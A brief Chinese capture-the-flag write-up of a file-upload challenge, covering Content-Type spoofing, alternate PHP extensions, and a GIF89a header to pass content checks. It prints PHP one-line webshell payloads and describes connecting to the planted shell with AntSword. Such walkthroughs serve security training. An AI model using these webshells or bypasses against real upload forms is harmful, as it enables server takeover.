知识点
1.Content-Type绕过
2.文件头绕过
3.后缀名绕过
题目
拿到题目是一道上传题
先来简单地上传一个一句话木马
<?php @eval($_POST['a']);?>
保存为a.php
抓包
提示Not image!
那我们来更改一下Content-Type: image/jpeg
又提示Not php
它既要是一张图片的格式又要是php的文件
我们来改改后缀试试
php,php3,php4,php5,phtml,pht
这里被html实体化,应该是这个样子
考虑绕过
<script language="php">eval($_POST['a']);</script>
又提示
应该是校验了文件的内容
在文件内容的前面加上GIF89a的标识
用蚁剑连一下,在根目录下查找(一般上传后的文件都在upload下)
